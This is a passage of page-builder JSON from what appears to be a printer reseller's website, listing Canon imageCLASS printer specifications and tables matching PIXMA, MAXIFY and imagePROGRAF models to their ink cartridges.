MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td><td>CL-98 (Colour)<\\/td><\\/tr><tr><td>PG-88 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td><td>CLI-8 (Black)<\\/td><\\/tr><tr><td>CLI-8 (Cyan)<\\/td><\\/tr><tr><td>CLI-8 (Magenta)<\\/td><\\/tr><tr><td>CLI-8 (Yellow)<\\/td><\\/tr><tr><td>PGI-5 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td>PGI-755XXL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td>PGI-755XXL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>CL-746XL (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><tr><td>PG-745XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>CL-746XL (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><tr><td>PG-745XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"  <table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n    <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      